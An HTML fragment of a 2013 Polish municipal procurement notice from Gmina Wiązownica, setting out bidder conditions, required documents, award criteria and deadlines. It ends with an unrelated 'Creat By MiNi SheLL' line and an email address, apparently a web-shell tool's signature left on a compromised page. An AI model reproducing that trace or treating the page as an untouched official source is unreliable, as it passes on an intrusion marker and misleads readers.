</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawcy są:
-  ubezpieczeni od odpowiedzialności cywilnej w zakresie działalności związanej z 
   przedmiotem zamówienia na kwotę co najmniej 300 000 złotych (słownie: trzysta tysięcy 
   złotych).
      Ocena spełniania warunku zostanie dokonana na podstawie załączonego do oferty: 
      a) oświadczenia wykonawcy o spełnianiu warunków udziału w postępowaniu - art. 22 ust.1
      b) opłaconej polisy ubezpieczenia OC z tytułu prowadzonej działalności gospodarczej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- formularz oferty;
- parafowany projekt - istotne postanowienia umowy;
- pełnomocnictwo w przypadku wspólnego ubiegania się o udzielenie zamówienia;
- pisemne zobowiązanie podmiotów oddających do  dyspozycji wykonawcy niezbędnych 
  zasobów na okres korzystania z nich przy wykonywaniu zamówienia (jeżeli dotyczy).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Warunki zmiany umowy:
1.	Wszelkie zmiany w umowie pod rygorem nieważności  muszą być dokonane w formie pisemnej.
2.	Zamawiający zgodnie z art. 144 ustawy Pzp. przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności:
1)	siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ o charakterze niezależnym od stron,
2)	zmiany obowiązujących przepisów regulujących zasady odbioru i zagospodarowania odpadów,
3)	zmiana obowiązującej stawki VAT,
4)	zmiana sposobu rozliczenia umowy lub dokonywania płatności na rzecz Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wiazownica.com  lub www.bip.wiazownica.com<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Wiązownica
37-522 Wiązownica 208
pok. nr 42  II p..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.06.2013 godzina 09:00, miejsce: Urząd Gminy Wiązownica
37-522 Wiązownica 208
Sekretariat Urzędu pok. nr 22  I p..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com